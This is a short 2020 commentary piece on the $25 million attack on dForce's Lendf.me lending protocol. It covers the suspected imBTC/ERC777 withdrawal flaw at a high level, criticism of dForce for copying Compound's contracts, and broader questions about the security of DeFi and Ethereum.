DForce Suffered $25 Million Loss in Attack

  • Commentary
  • April 25, 2020

The Chinese-based decentralized finance platform, dForce suffered an attack on Sunday, April 19th, with losses amounting to $25 million, almost the entire balance of assets locked in its yield-on-deposit protocol Lendf.me. Although subsequent reporting indicates that the attacker returned the majority of said funds, the dForce team has permanently disabled the Lendf.me smart contracts and the protocol’s future is unclear. Members of the decentralized finance (DeFi) community have speculated that the attack was due to the protocol’s integration with imBTC, an Ethereum-based token that is pegged 1:1 with BTC. The working theory is that imBTC’s use of the ERC777 token standard allowed the attacker to withdraw funds from the protocol’s smart contract before the balance could be updated, allowing them to extract the funds at almost no cost. dForce was the subject of a $1.5 million investment from the blockchain and cryptoasset investment firm, Multicoin Capital, announced just five days prior with the firm describing the platform as a “super-network”, lauding its focus on user experience and supposedly offering a compelling suite of complementary protocols. The platform, however, has been subject to robust criticism, with Compound CEO, Robert Leshner claiming that it copied Compound’s smart contracts without acknowledgment and stating ”If a project doesn’t have the expertise to develop its own smart contracts, and instead steals and redeploys somebody else’s copyrighted code, it’s a sign that they don’t have the capacity or intention to consider security.”

The dForce attack is a particularly illustrative example of the vulnerability of many DeFi protocols and perhaps Ethereum DeFi protocols especially. Critics of the Ethereum network point to its supposed larger attack surface relative to other smart contracting networks, specifically its Turing-completeness, use of a compiler, and lack of formal verification. It has been suggested that the dForce attack, if indeed it was due to a weakness with imBTC, was similar in nature to the infamous 2016 DAO attack, which ultimately led to the contentious Ethereum-Ethereum Classic hardfork. While such criticisms may be too general and perhaps unfair to the Ethereum ecosystem and that of DeFi particularly, the dForce example does at least highlight the necessity for such protocols to go through extremely robust internal and third-party security audits, and the requirement for teams to understand the intricacies of their codebases. Ultimately, however, no audit is fool-proof and, with the DeFi sector collectively holding over $750 million worth of assets, there remain serious questions about the security of these protocols, especially given their immutable property.